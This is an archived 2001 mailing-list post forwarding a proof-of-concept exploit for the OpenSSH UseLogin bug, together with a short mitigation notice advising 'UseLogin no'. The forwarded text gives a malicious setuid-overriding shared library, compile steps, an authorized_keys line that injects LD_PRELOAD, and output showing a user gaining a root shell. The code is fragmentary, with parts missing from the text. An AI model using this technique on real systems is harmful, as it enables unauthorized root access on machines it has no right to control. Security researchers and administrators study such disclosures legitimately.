Subject: Fwd: OpenSSH UseLogin proof of concept exploit
To: None <>
From: Lubomir Sedlacik <>
List: netbsd-users
Date: 12/06/2001 02:49:49
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable


confirmed on:

NetBSD 1.5X  - OpenSSH_2.9 NetBSD_Secure_Shell-20010624
NetBSD 1.5.2 - OpenSSH_2.5.1 NetBSD_Secure_Shell-20010614

everyone who use "UseLogin yes" and have key authentication allowed for loc=
users, please at least set "UseLogin no" or comment it out.

----- Forwarded message from "[WaR]" <> -----

Date: Thu, 6 Dec 2001 00:34:34 +0000
From: "[WaR]" <>
Subject: OpenSSH UseLogin proof of concept exploit

--[ OpenSSH UseLogin bug proof of concept exploit ]--
  by [WaR] <> /

--[ Intro ]--

 I was very curious in finding out how to exploit this problem. Although
 I don't think anyone uses this feature, I looked into the matter anyway.
 Here it goes. It was tested on the following platforms:
  - Slackware 7.1 with OpenSSH3.0p1
  - RedHat 7.1 with OpenSSH_2.9p2
  - RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)
  - OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)
 The exploit should work as long as UseLogin does. YMMV.

 This is based on libroot from,
 published a few years ago for exploiting the telnetd LD_PRELOAD bug (and
 you thought it wouldn't happen again...).

 Kudos to for his help figuring out the problem with
 the Slackware UseLogin, testing on OpenBSD, and giving the ideia for
 the seteuid(0) (it originally was a system("/bin/sh");).

--[ Code ]--

 Create a lib.c file with the next content:

 #include <stdio.h>
 int setuid(int uid){
   printf("setuid() called...\n");

 Compile it into a library:
 gcc -c -o lib.o lib.c
 ld -shared -o lib.o
 chmod 755 ./

 Now, for the tricky (*g*) part...

 You must have an account on the machine, and create an entry
 on $HOME/.ssh/authorized_keys (or authorized_keys2) with:

 environment=3D"LD_PRELOAD=3D<your home>/" <your public key>

 When sshd receives your connection, it will export this variable
 into the environment *BEFORE* running login. Somewhere after this,
 it executes a setuid. When it does, it makes a seteuid(0).

 $ id
 uid=3D1000(war) gid=3D100(users) groups=3D100(users)
 $ ssh war@localhost
 Enter passphrase for key '/home/war/.ssh/id_dsa':
 sh-2.04# id
 uid=3D0(root) gid=3D100(users) groups=3D100(users)

 It also works remotely. Anyway, you _MUST_ have an account on
 the victim machine so you can setup the enviroment, and login.
 And obviously (duh) it must have UseLogin enabled.

 That's all.

 shout outs to Zav @, Smil3r, and everyone at

-- [WaR]
"if you can't hack it, hit it with a hammer"

----- End forwarded message -----


-- Lubomir Sedlacik <>   ASCII Ribbon campaign against  /"\=
--                  <>   e-mail in gratuitous HTML and  \ /=
--                                       Microsoft proprietary formats   X =
-- PGPkey:                                  / \=
-- Key Fingerprint: DBEC 8BEC 9A90 ECEC 0FEF  716E 59CE B70B 7E3B 70E2     =

Content-Type: application/pgp-signature
Content-Disposition: inline

Version: GnuPG v1.0.6 (NetBSD)
Comment: For info see